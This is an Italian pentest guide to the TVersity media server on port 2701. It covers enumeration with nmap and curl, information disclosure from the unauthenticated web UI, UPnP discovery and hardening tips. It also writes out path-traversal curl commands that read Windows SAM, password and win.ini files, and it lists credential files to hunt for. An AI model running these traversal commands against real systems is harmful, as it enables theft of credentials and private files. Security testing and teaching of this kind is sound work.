Porta 2701 TVersity: Web UI e Information Disclosure
Porta 2701 TVersity nel pentest: media server con web UI esposta, disclosure dei file condivisi e analisi della superficie di accesso.
- Pubblicato il 2026-04-13
- Tempo di lettura: 2 min
Executive Summary — TVersity è un media server per Windows che permette di condividere e streammare contenuti multimediali (video, musica, foto) verso dispositivi DLNA/UPnP come smart TV, console e media player. Gira sulla porta 2701 (HTTP) e serve un’interfaccia web per la configurazione e lo streaming. Non è un target classico del pentest enterprise — si trova su reti domestiche e piccoli uffici. Il valore nel pentest è limitato: interfaccia web senza autenticazione di default, possibili directory traversal nelle versioni vecchie e information disclosure (file locali esposti via streaming).
Cos’è la porta 2701 (TVersity Media Server)
- TVersity è un media server Windows sulla porta 2701 — interfaccia web spesso senza autenticazione
- Rischi: directory traversal (versioni vecchie), esposizione di file locali, information disclosure
- Poco rilevante in contesti enterprise, ma utile se presente in rete interna
Cos’è TVersity #
TVersity è un’applicazione Windows che funziona come server multimediale:
TVersity Server (:2701) Dispositivi client
┌──────────────────────┐ ┌────────────────┐
│ Web UI │ ◄── HTTP ── │ Browser │
│ DLNA/UPnP server │ ◄── SSDP ── │ Smart TV │
│ │ │ Xbox / PS │
│ Libreria media: │ ── stream ──►│ Media player │
│ C:\Users\Videos\ │ └────────────────┘
│ C:\Users\Music\ │
│ \\NAS\media\ │
└──────────────────────┘L’utente configura le directory da condividere tramite l’interfaccia web sulla porta 2701. TVersity transcodifica i media in tempo reale per renderli compatibili con diversi dispositivi.
1. Enumerazione #
Nmap #
nmap -sV -p 2701 10.10.10.40PORT STATE SERVICE VERSION
2701/tcp open http TVersity Media Server httpdBanner e interfaccia web #
curl -s http://10.10.10.40:2701/ -IHTTP/1.1 200 OK
Server: TVersity Media Server
Content-Type: text/htmlcurl -s http://10.10.10.40:2701/L’interfaccia web mostra la libreria multimediale configurata — senza autenticazione di default.
Cosa mostra l’interfaccia #
- Lista di file e directory condivisi
- Path completi del filesystem locale (C:\Users\admin\Videos\)
- Hostname e versione del server
- Opzioni di streaming e transcodifica2. Rischi di Sicurezza #
Information Disclosure #
L’interfaccia web espone:
- Path del filesystem: rivela la struttura delle directory locali, nomi utente Windows e path di rete
- File multimediali: foto e video personali accessibili senza autenticazione
- Configurazione di rete: share di rete montate (es.
\\NAS\media\) → rivela host NAS sulla rete
Directory Traversal (versioni vecchie) #
Le versioni precedenti di TVersity erano vulnerabili a path traversal:
curl "http://10.10.10.40:2701/geturl?url=file:///C:/Windows/System32/config/SAM"curl "http://10.10.10.40:2701/geturl?url=file:///C:/Users/admin/Desktop/passwords.txt"Se funziona → puoi leggere qualsiasi file dal filesystem Windows. Cerca:
C:\Users\[user]\Desktop\— documenti personaliC:\Users\[user]\.ssh\— chiavi SSHC:\inetpub\wwwroot\web.config— credenziali web app- File di configurazione con credenziali
Verifica la versione e cerca CVE specifici su Exploit-DB:
searchsploit tversityUPnP/DLNA Exposure #
TVersity annuncia la sua presenza via UPnP/SSDP sulla porta 1900. Se la rete non è segmentata, qualsiasi dispositivo sulla LAN vede il server:
# Discovery UPnP
nmap -sU -p 1900 --script=upnp-info 10.10.10.0/24Vettore per Lateral Movement #
TVersity stesso non è un vettore di escalation, ma le informazioni che espone sono utili:
- Username Windows dai path delle directory → target per credential attack
- Share di rete → target per enumerazione SMB
- File con credenziali se accessibili via directory traversal
3. Detection & Hardening #
- Non esporre TVersity su interfacce di rete esterne — solo localhost o VLAN dedicata
- Aggiorna alla versione più recente — le versioni vecchie hanno directory traversal
- Abilita autenticazione se disponibile nella versione in uso
- Limita le directory condivise — non condividere l’intero disco
- Firewall — porta 2701 accessibile solo dalla rete locale domestica
4. Cheat Sheet Finale #
| Azione | Comando |
|---|---|
| Nmap | nmap -sV -p 2701 target |
| Banner | curl -s http://target:2701/ -I |
| Interfaccia web | curl -s http://target:2701/ |
| Directory traversal | curl "http://target:2701/geturl?url=file:///C:/Windows/win.ini" |
| Searchsploit | searchsploit tversity |
| UPnP discovery | nmap -sU -p 1900 --script=upnp-info target |
Riferimento: TVersity documentation, Exploit-DB, UPnP/SSDP. Uso esclusivo in ambienti autorizzati.
